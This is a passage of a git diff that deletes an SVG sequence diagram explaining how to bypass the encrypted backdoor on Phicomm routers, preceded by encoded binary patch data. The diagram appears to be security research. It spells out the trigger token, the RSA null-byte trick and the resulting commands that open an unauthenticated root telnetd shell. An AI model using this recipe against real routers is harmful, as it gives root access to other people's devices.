z8wp^NBuZ(uyh7!&NZwzAxck5iG8bAkrAR^@c-53BGAA`V;u@gqp9~{|=>mY+Q}p(-
zqQ6|b^<mc2j-Xr>ey8#SZg<Qc=b5<;ApYqyXG9;s{&OrhH+Ne=Y+68-jt6ya)ExNg
zZ;APUX|zfxDJf}mN11_NSriH;%0U2w$XON8yUfyxzBL9y9q|~Y@YvX;G5ePTt5&ED
zr!xa%)|3+NNTCNBg79eRkSXy4lMUFA+t^TcwAs+eK=+$nf(Z1rm7vxaKbXIV+gOwt
z7Z+FF=t)LEKD%@}dJy1EwG~)*IVKxHDb>fD3mlUhZ51J=T+XYNT=y2a66O71onc%&
z2Fi<^)DdNVhfuV?%9wIIJ+x<srJ9I^w5E;+R|ISk-;wbn=e-8t+XmxjwbR(!Com7O
z>Qq94T=o2@=_YvG!L35et=X7th+UD9WLO4@BEk}A+al5X=Vt;-BlHaz)nzq--rx|b
z5(RZTPFE5`aPlGMnl5jU76g!TCPF@)2C#8^h9U||&@y1i6@E8z|BTYHVnCPQa1IBD
z!NWn&+?y^g%@gu#VXZ?4Jie?mH#eSI1^N{%yKapXQ#Hx|Lmev)Rx3wAs1U5^x~%$$
zz7?LS#x#JbtC!AunC;TF6J6g7U83bGcPvor13l%>1kf#_E$``70@1$q1fHw-aA}h)
zK9|X4(~d=5JntJc;MUn3x!zE_%V@8DF<Dys2BHS>{^GH(y4uCdzGW4RHo$_JJ6LC+
zW?16wrQHPYu6S_jm-R+%lIsF$!KR`}Qg?G(gP<7*+)k(J?0_&|8=e<U+NerD7)Oa8
z^KpUWZiTBdB`O<s0aV!XaDI0-tyYI8i}r{^MTMpGcm)87(7i}~)13Zx1lAVQc)S&g
zAsDY1BV2@}pLIw$O$XT?&MWwW2qTM;l0*`M&JYq9_L#Zmi?IQ5A|xAW@>83kBaUu^
zmr8`kwvI38<GpSjR#sM=%4rQQtRa9c<-f=hAbZ*!<)3iu3P1OE%EnGmL8xZf2Gf?C
zY9L?PlQRZMM(o_#ZI~+NXSEMi``qdXoPWC4VruqG3n?jv${^ys52_kU1}_7@dgOH_
z6zRF+Nb{7jvi9xUCsyq__c?B}>GthWDNSf(xb%TJd=<V=-e`jHM*bjn1a;nu(Tw@n
z^m&cr`JfJ372}5u&UqvTUh6!cuD4R0P8SLa(wkb&AgQyWOJFMj5WsHy#4SjiAABoI
z>EIhf8pK}FRqVeq3-nR{`%eTIL969<Y|y64nicUg0-^CV9)@X}UB|xz1nf+BakjGf
zqW-)f!>X^nhdOQw7=Otz=uI&IHVAtqh92mpmch*kn)M92>#Q|f9KIvZmdc|^MSH09
z-__71Pm0Rj+1V*peQH{LEuiu*IU3ZMwrQ%MB^$jlbc)IdMCw^R(!0WziWF7Xr5MtZ
zicYWVhSa$=yU^(7bgi=^FtwRzlC}XV6bMe`<n*Opn_CXwdGdO?xJ>+MUf|hj^f_vV
z^@>cr)(--ZX0iR6i4)5^PS1DU-I>v($upJvC}#XrV{XDcpE+i5qhUxLj1chrWE5Q+
zK4Pi%3~nDVagbCP3t67|_JkuTyi?6^JMMu)JgJ(#&hD9!i-w97E`S?-k+p<OdN1(T
zqB21{E#>GrCUy<tF_M0a<<lkucOy&5QLcR{%m5@wlWs7-w9Kbcm{ET}7&kM<tN2mB
z4~WX}Z^nhQ>Od}w_mhcq*-hk&thq$&S&3wgnBRKW9DM5=?b===)Ywl+=#&)~EcLbl
zdf@9Xu!{IuW=@pc9zA*WYv%kl6Q;X53$y+BG%Rv9cB7Wrq5IiJV0y^30o^T={PR~X
z$jq_kZQH`G=Pfg<?4Y&c-57P#L)7p&j?UDqruR#BY<*<aBId|mXOUym!BjxJuX`l>
z=<7|NYYC1CF7z%tkKdY$%^s{?+^5w1jovOLTYKbuyHdOR`_q~tsdrTZ>{d*#(^?;3
zm-4ym{O)V3g~l-3T(D1(d2~c*hDiadh#wn;az9S>kR@vpQenFT2ZZ}(+{Ll75<L9^
zSy|cMSIrZ7pX@<i`J_ZxeW;2oD?ERfr4HH00;$vjxIVAs(T{w!HgRdRQ81z*r`>@c
z!}j0iGl>jtyV-Giv+5xrTKMD>Si{@QIM=`U`1ImZAK@<5L)|v7;IQIGR^YI1=xsn`
z<umkXMVXw%p@=Lk1TMDnt()m{@ytS@xn+Rl#2k(E<vm8MNl;|2mn$A>sd@phQ5Xuj
zU}9+I@);__W7C9efM%f6ORnI+;6;`3^iLDYYuE0EaH#if0M|WvpW$jIKR?&YmoKgG
zxU)gi*f}_46?%!XCV|4$(CIPR*=17EzB-i;`zs7(hN0QkPm55gTzY*#hNZ4~Vj$mc
z@7~~0xx!1IMhog&dp>`@GO}Jvsshzil8M}oc<~5>e%szLXmGP$o`jEf?`tG}y%qA_
z3QZ8^a@|~1DMA%e@h<vg-<~jDfaFXvQYRZWRX3Ektq5wp$&1D%(cpJ$V=<B_C*$I5
zHir4+$P3ZbT<%`rPM62Vb>(jx4$E9~_Sqh$PSg1qpBp$b-tAfvie#w*B8Dq9rxt#6
z_vyc4uC61MiDBKBX)kbh7mYSlilp*ERAT<zi>rUFbW7(#0W|Yi1pe>IHDQUz{C`;!
z9^E%340N)sAA~pH(ITz5_=(48GriyN`t|D!dwYA&f!y<92z!-a!SS(x<rnnDw+0Bv
zP;Y;&S_-}(4mSn$pCDWV$I;39o8trVv*ox;R@X42w(nyB#0$wPo8BCLVG6Zbh~57E
zVXqF{lGPBUsxv&>*ER>IrKOP<i8Bofv6d5SyP3%2F6%mnxzJwXb9|#u8HC`Ks#Uf0
zK@*elfs)t@_l#yCs-7QvFQIVc>-%%|N~`f{Xe?m&xC`z#gT_5r2LT5ZQ36(_&Rn>d
z+V3;3dbDY<*bTj=XL;Tp8f!ZA^!I@EnM*SZl0M}e-OWwrt1o+Ruegyu0kPM1vp%2v
zY^M)Z)6T!S;m};HmXADW<kZ>3E1I;+{a&6gOkLv#*Yj5)!{SDH?1c>h;5-}bcmqN&
zB!8j?3;6G00iesCSejl8&!X`TP2wlYhBv^@-afRgtqsDAjw4rBx5QV^MSpiiRHS^!
zc*7vo()ze>O;<^vIR^M8kNC_3z3pjqlGl!t<uuy;QLH!73YW3esZ0*n79fRhMGNbU
zqNn6c+xBX#ZFNcTX3rMhI<OW<j6;;1+sYwL6TogTKkB6tFaviDtrZp@xYd;hjr5-D
zH*QoMQyIe?EZ35S=#y=gvSJxkJ<e<OC}4?Jn9#!jS69N?&=O;t5Ddj)r5!#Z_w0tz
z_Yx`sP{T0ET7)&HB`x;A<q)A{AtpLxhT(AE^)P;I{-@=Cw9mxPkM0MDoDI+(d+=mb
zR21xR?qmb6AOE<y67`?7tuo`dDTp{X$i{Z#Y{@?OuC$;tr`ifKJOyn1j_&Rg@b=u>
z>@)IoTHRYL{%o+xkYQ?=9I8`~9Il;%8F*0mxE(rtSRIR2FLsqI2AD4-E9Qg2wlFHh
zGmjiJbfga4?ypxXS>Nz&6nv`&N_i8{-U<bjJ3|j`*Yko_xm@@LXAd$#O&uv=x3_+S
zeM9C)K14P^c8T>RDOWP~wQBGU_CgB^n{BqI<36J+O&tg@Q0U~YpC5U4u?0k0WJ8=m
z2$xsK#%=imJ*s^V6>H0Pl#Dz#Dm=8;<nZ%tWRoy-b#+Y~E9PdSqMoL*<DLlCFlliN
z<7q+%d?fYt^_alu^!i}g97kYR(_WoWr|m>iIQEXqhY4X>Ild+tcutgzF;B@*g?x?2
z?Qvm`&TOM1H%I6Wm3Hph)f%v9%;Gf&xn8uRwZD^h!&{S`anO>7$tnV})|sU)h@0vA
zE!VBL1)G@5`%8ekyp7i6P^F6WSyoRN1}eL}LmjU*pPw9Sznoip0GX}hE?!E%IF+42
zp{TZzgT!g@Majg<bLY+_-Mp!UmAtj*1LsHFlYoSD#d;tBbFo=WJ749?CtyH17QLNk
z>%wLxK>8e>W9MRH$@tLLLOIGOO&SlALh*gb&S2ptLV~4>?XJ}UF(Xg)_F48jYkpib
zw!s(Bf6D6zZ`M|<d||?iKC{8tQPIn7bPl<?Rsz9q37T(qX^>|czwM7rLq0uG>!&ZF
zQ25AqQ7EUB{IqB+6kn04|4^1oP{U-XAXDTqrFlG)%vxM|{@aBEC19gFy1Mo=m3|Xm
zXXJbW34Ow#Ace9*_~-XMUr@%bc%x17Z1o%kO@O42l+Y}u#-9B2J&+Ksjkf2n9x<m-
zjxYN8U1$;_>F(jte0U5J(X8P(uEV34tZNw`v_jaKQ{v^i(azlVm6|tAgk6lLQ!K{V
zzF)VUwcmYPYM2~ie4@fnzs+Td|GQWIa_7jp*kYQlzn4N`<JV@W8H)Y1R49~?AE8H#
zI*p=wT9y2V62m*S9wmQ%!W4@7|Mt;czKDC(fRrsx`S9f?-D#A!f<L|WQ@V*9_A>77
z=i7V~O3mW$7nIaHhas^kjtMnUT)SEIF&wUsqkmlAiuHaSKtOttOszwB1YKO$ctn7T
zMYQ0|kE_17ib@~vd+OL4wpzn|bbv*F<zH{R-9DB&ObRqr`c3vXzYZZRHr3rfe#yFy
znMq`0k#kY4?3C(?Q@>n+vR{X-%BZo4>zl(Hk1qDJqy6>6JH}Y*v`YW}zP=`wx|2R*
ztsR}6g8KYq*%xg2dBNC01=FL%Id^&;*5ffj)KD2WCm~>3_g)aql#4CeuumL+e#0f;
zy~@hU8sgOFFEdT#UcC09)9D*)>YhGzzWWeQv6cGcIJwVKC!7D8hj=Lkq3J~p>}rOq
zrYwm3anCe_nIrxE{kJb}A<zDC$B#SS*EC(f<n&RJulj08{CG;=xESLjBO@)RHHCw(
zWESdRr@r-H^5dWDW;4c{&=!C3MiL!WlmA>w<Y?=dmE_$s4=WB|AOGX)@5xd7Js|mS
zy>Lu81T`jEuqM<W7qMc%?@}}Lm%^CevBk5?-h5#YeHMkX`@c`8*7>-jZ#Vo{MpOCq
ze`H<%ePjI}Y^MMJ(m%u6f9S0GH*c^0c0ULpZB846bfp?}3R-!7n7)V^VPK+S>oV5t
zb5+R6)5g&?C88x^rIfqtZ}f@Q<{DwWvD#t>^`89V!OT{lMMEwr5lL5;syp;NM){QM
z+!SxnccO)yV-_t_Nk&@Q;*)1wqI4W9I~(ym3)>%EJ(6+#!f3N-Dxb$>?m+gFu}0gI
zYDbkfeHyPHYzcldh|@GmKFcekFI7H1{#%p&x=kZJ`6nYuYUSRuoI>GuHlC3L*(8oc
zl|GHG#n|R|%0Z=#6=F1iR+#{HoE|HF1P3qUrb(t!@z@7>eCEqnuaYlbw7p*k4kXn;
zs_@n=`vV?bH(qF@8(zL?iclJ%lUjg=)%FKoAl)KAQCN6%r33x}RunIz+A?Ty#-}d8
zLU0{AKbI+M43*9=rb?xfO!rai2~c>X27_bp+$%HZM=KRvyI-Gs^#<vczH}sX49RVI
z=>BuuAf0c~@O{mrUKuOm+7nIWDtDixZ|^akiBmxCis}jzpzcmc_@Qy>H{(DSRJI1y
zF<t-wIrYM_d*sNWh-@G^MKA+@Q(zpyOVL{Y{y!|Srn%!DpyI52S9WYFg83c=;v9nn
z!x3n`yZj8?@ZG%2NgTx=J!_KD;Ljaa(eE!U`=4G?Ts*zbKI`_p4^B#GwPw<jiubNK
zu4r3>M{@!z=DCLyK8!#1lplerPDB`FK!HSpEX9sr0zJ*}0wzmOy>KrYCon~o!G;IC
m>@@isc0=+KZ}89mFs5?j*4@M<<rk^sI<?g|F)}w;`2QD-vG(Ku

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
deleted file mode 100644
index 9c61254..0000000
--- a/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1672" height="3333"><desc>title%20Picking%20the%20Lock%20on%20Phicomm's%20Encrypted%20Backdoor%2C%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnTwo%20things%20are%20essential%20here%3A%5Cn%5Cn(1)%20the%20fate%20of%20this%20message%20is%20to%20be%20decrypted%20with%20the%5Cn%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%20and%20then%20**XOR**ed%20with%20a%20%5Cnrandomly%20generated%20secret%20text%2031%20ASCII-printable%5Cnbytes.%5Cn%5Cn(2)%20the%20result%20of%20these%20two%20operations%20will%20then%20be%5Cnconcatenated%20with%20the%20salt%20%3Ccolor%3A%23purple%3E**using%20sprintf%20and%20the%20%25s%5Cnformat%20string**%3C%2Fcolor%3E.%5Cn%5CnIf%20we%20can%20discover%20a%20phony%20ciphertext%20that%2C%20when%20decrypted%20with%5Cn**RSA_public_decrypy()**%2C%20with%20the%20%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%5Cnand%20the%20**RSA_NO_PADDING**%20option%2C%20yields%20a%20bytestring%20that%5Cnbegins%20with%20a%20byte%20between%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7f%3C%2Fcolor%3E%2C%20then%20we%20will%20have%20a%5Cn1%20in%2092%20chance%20of%20tricking%20the%20Server%20into%20generating%20a%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E%5Cnthat%20begins%20with%20a%20**NULL%20BYTE**.%20This%20will%20cause%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%5Cnto%20be%20nothing%20but%20hashes%20of%20their%20respective%20salts.%5Cn%5CnStore%20the%20result%20of%20this%20search%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3AWe%20no%20longer%20need%20to%20be%20able%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%2C%20and%20so%20we%20no%20longer%5Cnhave%20any%20need%20of%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E.%5Cn%5CnWe%20can%20simply%20set%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20to%20the%5Cn**empty%20string**.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn%3Ccolor%3A%23red%3E**Note%20that%20if%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**MASKED_SECRET**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20begins%20with%20a%20null%20byte%2C%5Cnthen%20the%20strings%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_TEMP_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20and%20%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_PERM_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20will%5Cnjust%20be%20%3C%2Fcolor%3E%3Ccolor%3A%23darkred%3E%22%2BTEMP%22%3C%2Fcolor%3E%20%3Ccolor%3A%23red%3Eand%3C%2Fcolor%3E%20%3Ccolor%3A%23darkred%3E%22%2BPERM%22%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2C%20respectively!%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsuffixes%20to%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5Cn%3Ccolor%3A%23red%3E**Remember%20that%20we%20have%20set%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**SECRET_PLAINTEXT**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20to%5Cnthe%20empty%20string%2C%20so%20the%20suffix%20is%20all%20we%20need%20to%5Cnknow.%3C%2Fcolor%3E**%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%5Cn%5Cn%3Ccolor%3A%23red%3E**Here%2C%20all%20we%20need%20to%20do%20is%20compute%20the%20MD5%5Cnhash%20of%20%3Ccolor%3A%23darkred%3E%2BTEMP%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20or%20%3Ccolor%3A%23darkred%3E%2BPERM%3C%2Fcolor%3E%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1672" height="3333"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="22.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="297.366151838796" y="32.04212955" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Picking the Lock on Phicomm's Encrypted Backdoor, on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 125.39153363899999 L 62.80785098743945 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 125.39153363899999 L 905.7354112766808 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 10.68070985 67.715700449 L 114.9349921248789 67.715700449 L 114.9349921248789 125.39153363899999 L 10.68070985 125.39153363899999 L 10.68070985 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="33.8578502245" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 849.7749380774737 67.715700449 L 961.6958844758879 67.715700449 L 961.6958844758879 125.39153363899999 L 849.7749380774737 125.39153363899999 L 849.7749380774737 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="872.9520784519738" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 52.12714113743945 136.072243489 L 73.48856083743945 136.072243489 L 73.48856083743945 3312.515352879 L 52.12714113743945 3312.515352879 L 52.12714113743945 136.072243489" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 895.0547014266808 238.607058049 L 916.4161211266808 238.607058049 L 916.4161211266808 3312.515352879 L 895.0547014266808 3312.515352879 L 895.0547014266808 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 411.634557619 L 927.0968309766807 411.634557619 L 927.0968309766807 514.169372179 L 905.7354112766808 514.169372179 L 905.7354112766808 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 1093.063846049 L 84.16927068743945 1093.063846049 L 84.16927068743945 3312.515352879 L 62.80785098743945 3312.515352879 L 62.80785098743945 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 1261.819061679 L 927.0968309766807 1261.819061679 L 927.0968309766807 3312.515352879 L 905.7354112766808 3312.515352879 L 905.7354112766808 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266809 1392.123721849 L 937.7775408266808 1392.123721849 L 937.7775408266808 3312.515352879 L 916.4161211266809 3312.515352879 L 916.4161211266809 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1565.151221419 L 948.4582506766808 1565.151221419 L 948.4582506766808 3312.515352879 L 927.0968309766808 3312.515352879 L 927.0968309766808 1565.151221419" stroke-miterlimit="10" 